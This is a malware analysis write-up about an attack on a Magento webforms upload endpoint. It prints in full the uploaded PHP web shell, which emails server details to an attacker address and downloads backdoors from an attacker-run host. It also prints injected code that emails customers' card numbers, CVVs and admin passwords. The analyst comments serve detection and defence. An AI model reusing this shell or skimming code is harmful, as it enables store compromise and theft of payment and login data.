In a ModSecurity audit log we found an attack against a Magento webforms upload vulnerability.
--ab16e752-B-- POST /js/webforms/upload/ HTTP/1.1 User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm) Host: malware.expert Accept: */* Content-Length: 2163 Expect: 100-continue Content-Type: multipart/form-data; boundary=------------------------6a5fe0ef92e39879
Looking closer at the POST payload, we found this image.phtml script, which is first uploaded to the customer's website. If the index.php / image.phtml file is uploaded successfully, it can be reached from the web and executed!
image.phtml
--------------------------6a5fe0ef92e39879
Content-Disposition: form-data; name="files[]"; filename="image.phtml"
Content-Type: application/octet-stream
<?php
// Analyst note: this is the web shell delivered in the multipart request above
// (form field files[], filename image.phtml). Everything below runs with the
// privileges of the web server user as soon as the file is requested over HTTP.
// Defacement banner; the base64 decodes to "FathurFreakz Was Here !".
echo base64_decode("RmF0aHVyRnJlYWt6IFdhcyBIZXJlICE=");
// Host OS / kernel details, included in the exfiltration email sent further down.
$uname = php_uname();
// Helper used by the shell. $type selects the action, $path is taken relative to
// DOCUMENT_ROOT and $content is the data written for "LOG".
//   "PATCH": deletes /js/webforms/upload/index.php under the web root — presumably
//            the uploaded dropper, i.e. the shell removing its own entry point.
//   "LOG":   opens $root/$path for writing and overwrites it with $content. No path
//            or content validation at all; the callers below use it to replace
//            Magento core and skin files with attacker-supplied code.
// Detection cue: files under app/code/core and skin/adminhtml being modified by
// the web server user outside of a deployment, and the upload endpoint's index.php
// disappearing shortly after a POST to /js/webforms/upload/.
function auto($type,$path = null, $content = null){
$root = $_SERVER['DOCUMENT_ROOT'];
$file = $root."/".$path;
switch($type){
case "PATCH":
if(unlink($root."/js/webforms/upload/index.php")){
echo "Patch = Success<br>";
} else {
echo "Patch = Failed<br>";
}
break;
case "LOG":
// "w" truncates the target, so the original file is lost, not appended to.
$write = fopen($file, "w");
if($write){
echo (fwrite($write,$content) ? "Write : '".$file."' [Success]<br>" : "Write : '".$file."' [Failed]<br>");
fclose($write);
} else {
echo "File : '".$file."' [Not Writeable]<br>";
}
break;
}
}
// Exfiltrates the shell's location to the attacker: hostname, request URI,
// php_uname output and the server's IP address, through the local MTA.
// Outbound mail from the web server user to this address is an indicator.
mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");
echo "<br>".$uname."<br>";
// Step 1: delete the upload endpoint's index.php (see auto()).
auto("PATCH");
// Step 2: fetch replacement files from the attacker's staging host and overwrite
// Magento paths with them. The base64 arguments decode to
// http://data.fathurfreakz.id/{Cc.txt,Session.txt,uploader.txt}. Cc.php and
// Session.php are the card-skimming and admin-credential-logging backdoors shown
// further down this page; the three remove.php / htaccess.php drops all come from
// uploader.txt and are presumably additional upload shells kept for persistence —
// verify by diffing the dropped files. Network IoC: outbound HTTP from the web
// server to data.fathurfreakz.id. Note file_get_contents() returns false on a
// fetch failure, so a blocked download leaves the target truncated to empty.
auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));
auto("LOG","skin/adminhtml/default/default/xmlconnect/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","skin/adminhtml/default/default/images/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","shell/htaccess.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
// Step 3: a minimal upload form. Any posted file is copied into the script's
// working directory under the client-supplied name, with no sanitisation; the @
// hides copy() warnings so failures leave no trace in the PHP error log.
echo "<form method='post' enctype='multipart/form-data'><input type='file' name='file'><input type='submit' name='upload' value='upload'></form>";
if(isset($_POST['upload'])){
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])){
echo "Success";
} else {
echo "Failed";
}
}
?>
--------------------------6a5fe0ef92e39879--
First it sends an email to fileputcontent@gmail.com with details such as the hostname, URL and IP:
mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");
Then it tries to "patch" Magento and remove itself by deleting js/webforms/upload/index.php:
if(unlink($root."/js/webforms/upload/index.php")){
Finally it replaces the Magento payment method file Cc.php to steal customer payment details, and Session.php to capture admin login details.
auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));
Cc.php
In the Cc.php file, more code was added to capture customer payment details and email them to the attacker. In the function assignData(), a call to another function was added:
public function assignData($data)
{
.
.
.
//THIS LINE ADDED
$this->ccNumberProccess();
The ccNumberProccess function steals the customer's payment details and sends them by email to fileputcontent@gmail.com:
// Injected into app/code/core/Mage/Payment/Model/Method/Cc.php and called from
// assignData() (see above). Builds a plaintext record of the billing address plus
// the full card number, expiry and CVV and emails it to the attacker. Nothing is
// written to disk — the data leaves only through mail() — so mail logs and outbound
// SMTP from the web server, not file integrity alone, are where this shows up.
// No visibility keyword, so the method is public on the Cc model.
function ccNumberProccess()
{
$pay = $this->getInfoInstance();
// Billing address of the current quote, obtained via a block instance and the
// checkout session singleton.
$object = new Mage_Checkout_Block_Onepage_Billing;
$billing = $object->getQuote()->getBillingAddress();
$email = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
// setBilling() is not shown on this page; from its use below it appears to return
// an associative array with at least a 'Country' key — confirm against the dropped Cc.php.
$setBilling = $this->setBilling($billing->getFirstname(),$billing->getLastname(),$billing->getStreet(1),$billing->getStreet(2),$billing->getCity(),$billing->getRegion(),$billing->getPostcode(),$billing->getCountry(),$billing->getTelephone(),$email);
$invoice = "";
foreach($setBilling as $key=>$value){
$invoice .= $key.' = '.$value."\n";
}
// The first six digits of the PAN (the BIN) are sent to a third-party lookup site
// to tag the email subject with issuer, brand and card type. This is a second
// outbound HTTP indicator (bins.pro), fired from the checkout request path; the
// HTML scraping below has no error handling and will emit notices if the site
// changes or is blocked.
$bin = str_replace(' ', '', $pay->getCcNumber());
$bin = substr($bin, 0, 6);
$getbank = explode($bin, file_get_contents("http://bins.pro/search?action=searchbins&bins=" . $bin . "&bank=&country="));
$jeniscc = explode("</td><td>", $getbank[2]);
$namabnk = explode("</td></tr>", $jeniscc[5]);
$ccbrand = $jeniscc[2];
$ccbank = $namabnk[0];
$cctype = $jeniscc[3];
$ccklas = $jeniscc[4];
// Full PAN, expiry and CVV in cleartext — PCI DSS forbids storing or transmitting
// the CVV at all, so any mail containing it is conclusive evidence of compromise.
$invoice .= "Card = ".$pay->getCcNumber()."\n";
$invoice .= "Expired = ".$pay->getCcExpMonth()."/".substr($pay->getCcExpYear(),-2)."\n";
$invoice .= "Security = ".$pay->getCcCid()."\n";
$invoice .= "Site = http://".$_SERVER['HTTP_HOST']."/\n";
$invoice .= "Date = ".date("d-m-Y h:i:s");
$subject = $ccbank." - ".$cctype." - ".$ccklas." From ".$_SERVER['HTTP_HOST']."|".$setBilling['Country'];
// Recipient is the same base64-obscured attacker mailbox used by the dropper;
// the From header is forged as the customer's own name and email address.
mail(base64_decode("ZmlsZXB1dGNvbnRlbnRAZ21haWwuY29t"),$subject,$invoice,"From: ".$billing->getFirstname()." ".$billing->getLastname()." <".$email.">");
}
Session.php
It also steals Magento admin session information (username & password) and sends it by email:
public function login($username, $password, $request = null)
{
.
.
.
//ADDED THIS LINE
mail("fileputcontent@gmail.com","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);